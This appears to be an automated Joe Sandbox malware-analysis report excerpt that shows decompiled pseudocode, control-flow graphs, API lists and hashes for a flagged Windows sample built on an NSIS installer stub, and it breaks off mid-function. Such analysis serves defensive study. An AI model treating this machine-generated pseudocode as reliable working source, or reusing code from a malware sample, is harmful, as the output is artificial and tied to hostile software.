                                                                            control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 309 403c51-403c62 call 40640b 305->309 310 403c67-403c6d lstrcatW 305->310 309->310 310->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cd4 call 40640b 319->321 325 403d43-403d68 LoadImageW 320->325 326 403d37-403d3e call 40657a 320->326 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 325->330 331 403d6a-403d9a RegisterClassW 325->331 326->325 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 344 403df3-403df6 330->344 345 403dfb-403e06 call 403ec2 330->345 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 360 403e32-403e44 GetClassInfoW 354->360 361 403e28-403e2d call 40689a 354->361 358 403e95-403e97 355->358 362 403eb1-403eb3 call 40140b 358->362 363 403e99-403e9f 358->363 366 403e46-403e56 GetClassInfoW RegisterClassW 360->366 367 403e5c-403e7f DialogBoxParamW call 40140b 360->367 361->360 362->335 363->344 368 403ea5-403eac call 40140b 363->368 366->367 371 403e84-403e8d call 403b3c 367->371 368->344 371->338
                                                                            C-Code - Quality: 96%
                                                                            			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                            0x00403bf2
                                                                            0x00403bfb
                                                                            0x00403c02
                                                                            0x00403c04
                                                                            0x00403c18
                                                                            0x00403c2a
                                                                            0x00403c33
                                                                            0x00403c3c
                                                                            0x00403c43
                                                                            0x00403c48
                                                                            0x00403c4f
                                                                            0x00403c62
                                                                            0x00403c62
                                                                            0x00403c6d
                                                                            0x00403c06
                                                                            0x00403c11
                                                                            0x00403c11
                                                                            0x00403c72
                                                                            0x00403c7c
                                                                            0x00403c85
                                                                            0x00403c8a
                                                                            0x00403c9b
                                                                            0x00403d2d
                                                                            0x00403d35
                                                                            0x00403d3e
                                                                            0x00403d3e
                                                                            0x00403d54
                                                                            0x00403d5a
                                                                            0x00403d68
                                                                            0x00403de9
                                                                            0x00403df1
                                                                            0x00403dfb
                                                                            0x00403e00
                                                                            0x00403e06
                                                                            0x00403e90
                                                                            0x00403e95
                                                                            0x00403e97
                                                                            0x00403eb3
                                                                            0x00000000
                                                                            0x00403eb3
                                                                            0x00403e99
                                                                            0x00403e9f
                                                                            0x00403ea7
                                                                            0x00403ea7
                                                                            0x00000000
                                                                            0x00403e9f
                                                                            0x00403e14
                                                                            0x00403e1f
                                                                            0x00403e24
                                                                            0x00403e26
                                                                            0x00403e2d
                                                                            0x00403e2d
                                                                            0x00403e38
                                                                            0x00403e40
                                                                            0x00403e42
                                                                            0x00403e44
                                                                            0x00403e4d
                                                                            0x00403e50
                                                                            0x00403e56
                                                                            0x00403e56
                                                                            0x00403e75
                                                                            0x00403e86
                                                                            0x00000000
                                                                            0x00403e8b
                                                                            0x00403df3
                                                                            0x00403df5
                                                                            0x00000000
                                                                            0x00403d6a
                                                                            0x00403d6a
                                                                            0x00403d76
                                                                            0x00403d80
                                                                            0x00403d86
                                                                            0x00403d8b
                                                                            0x00403d9a
                                                                            0x00403eb8
                                                                            0x00403eb8
                                                                            0x00000000
                                                                            0x00403eb8
                                                                            0x00403da9
                                                                            0x00403de4
                                                                            0x00000000
                                                                            0x00403de4
                                                                            0x00403ca1
                                                                            0x00403ca1
                                                                            0x00403ca4
                                                                            0x00403ca6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403cb4
                                                                            0x00403cc6
                                                                            0x00403ccb
                                                                            0x00403cd4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403cda
                                                                            0x00403cdc
                                                                            0x00403ce9
                                                                            0x00403ce9
                                                                            0x00403cf2
                                                                            0x00403cf8
                                                                            0x00403d20
                                                                            0x00403d28
                                                                            0x00000000
                                                                            0x00403d0a
                                                                            0x00403d0b
                                                                            0x00403d14
                                                                            0x00403d1a
                                                                            0x00403d1b
                                                                            0x00000000
                                                                            0x00403d1b
                                                                            0x00403d16
                                                                            0x00403d18
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403d18
                                                                            0x00403cf8

                                                                            APIs
                                                                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                            • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76FA3420), ref: 00403CED
                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                            • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                            • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-1862882193
                                                                            • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                            • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 400 40325a-403262 call 403019 393->400 401 40313a-403141 393->401 398 403205-40321d call 4034e5 call 4034cf 394->398 399 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->399 395->380 398->395 422 40321f-403225 398->422 399->395 426 403264-403275 399->426 400->395 404 403143-403157 call 405fe8 401->404 405 4031bd-4031c1 401->405 413 4031cb-4031d1 404->413 424 403159-403160 404->424 412 4031c3-4031ca call 403019 405->412 405->413 412->413 417 4031e0-4031e8 413->417 418 4031d3-4031dd call 4069f7 413->418 417->390 425 4031ee 417->425 418->417 422->395 422->399 424->413 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->413 431 40316b-403172 428->431 429->430 432 403283-403289 430->432 431->413 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fe8 432->434 433->413 436 40317d-40319d 433->436 437 4032ab 434->437 436->395 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->413 441 4031b9-4031bb 440->441 441->413
                                                                            C-Code - Quality: 80%
                                                                            			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040653D(0x444000, E00405E58(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0xe2df4
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0xe2df8
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                            0x00403085
                                                                            0x00403088
                                                                            0x0040308b
                                                                            0x0040308e
                                                                            0x00403094
                                                                            0x004030a5
                                                                            0x004030aa
                                                                            0x004030bd
                                                                            0x004030c2
                                                                            0x004030c5
                                                                            0x004030cb
                                                                            0x00000000
                                                                            0x004030cd
                                                                            0x004030d8
                                                                            0x004030de
                                                                            0x004030ef
                                                                            0x004030f6
                                                                            0x004030fc
                                                                            0x004030fe
                                                                            0x00403103
                                                                            0x00403105
                                                                            0x004031f0
                                                                            0x004031f2
                                                                            0x004031f7
                                                                            0x004031fe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403200
                                                                            0x00403203
                                                                            0x00403227
                                                                            0x00403227
                                                                            0x0040322c
                                                                            0x00403232
                                                                            0x0040323d
                                                                            0x00403242
                                                                            0x00403242
                                                                            0x00403245
                                                                            0x00403246
                                                                            0x00403247
                                                                            0x00403249
                                                                            0x0040324e
                                                                            0x00403251
                                                                            0x00403264
                                                                            0x00403268
                                                                            0x00403270
                                                                            0x00403275
                                                                            0x00403277
                                                                            0x00403277
                                                                            0x00403277
                                                                            0x0040327f
                                                                            0x0040327f
                                                                            0x00403282
                                                                            0x00403283
                                                                            0x00403283
                                                                            0x00403286
                                                                            0x00403288
                                                                            0x00403288
                                                                            0x00403288
                                                                            0x00403292
                                                                            0x00403298
                                                                            0x004032a6
                                                                            0x004032ab
                                                                            0x00000000
                                                                            0x004032ab
                                                                            0x00000000
                                                                            0x00403251
                                                                            0x0040320b
                                                                            0x00403216
                                                                            0x0040321b
                                                                            0x0040321d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403222
                                                                            0x00403225
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040310b
                                                                            0x00403110
                                                                            0x00403115
                                                                            0x00403119
                                                                            0x00403120
                                                                            0x00403125
                                                                            0x00403127
                                                                            0x00403129
                                                                            0x00403129
                                                                            0x0040312d
                                                                            0x00403132
                                                                            0x00403134
                                                                            0x0040325c
                                                                            0x00403253
                                                                            0x00000000
                                                                            0x00403253
                                                                            0x0040313a
                                                                            0x00403141
                                                                            0x004031bd
                                                                            0x004031c1
                                                                            0x004031c5
                                                                            0x004031ca
                                                                            0x00000000
                                                                            0x004031c1
                                                                            0x0040314a
                                                                            0x0040314f
                                                                            0x00403152
                                                                            0x00403157
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403159
                                                                            0x00403160
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403162
                                                                            0x00403169
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040316b
                                                                            0x00403172
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403174
                                                                            0x0040317b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040317d
                                                                            0x00403183
                                                                            0x0040318c
                                                                            0x00403192
                                                                            0x00403195
                                                                            0x00403197
                                                                            0x0040319d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004031a3
                                                                            0x004031a7
                                                                            0x004031af
                                                                            0x004031af
                                                                            0x004031b2
                                                                            0x004031b5
                                                                            0x004031b7
                                                                            0x004031b9
                                                                            0x004031b9
                                                                            0x00000000
                                                                            0x004031b7
                                                                            0x004031a9
                                                                            0x004031ad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004031cb
                                                                            0x004031cb
                                                                            0x004031d1
                                                                            0x004031dd
                                                                            0x004031dd
                                                                            0x004031e0
                                                                            0x004031e6
                                                                            0x004031e6
                                                                            0x004031e6
                                                                            0x004031ee
                                                                            0x004031ee
                                                                            0x00000000
                                                                            0x004031ee

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0040308E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                            • API String ID: 2803837635-1574639830
                                                                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 538 4034c2 526->538 527->526 532 403474-40347a 528->532 529->530 530->516 540 403388-403391 530->540 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 543 40348e-403493 call 4060df 536->543 538->524 542 403397-4033b7 call 406a65 540->542 547 403460-403462 542->547 548 4033bd-4033d0 GetTickCount 542->548 549 403498-40349a 543->549 547->518 550 4033d2-4033da 548->550 551 40341b-40341d 548->551 552 403464-403466 549->552 553 40349c-4034a6 549->553 554 4033e2-403413 MulDiv wsprintfW call 40559f 550->554 555 4033dc-4033e0 550->555 556 403454-403458 551->556 557 40341f-403423 551->557 552->518 553->532 558 4034a8 553->558 563 403418 554->563 555->551 555->554 556->525 559 40345e 556->559 561 403425-40342c call 4060df 557->561 562 40343a-403445 557->562 558->524 559->524 566 403431-403433 561->566 565 403448-40344c 562->565 563->551 565->542 567 403452 565->567 566->552 568 403435-403438 566->568 567->524 568->565
                                                                            C-Code - Quality: 95%
                                                                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
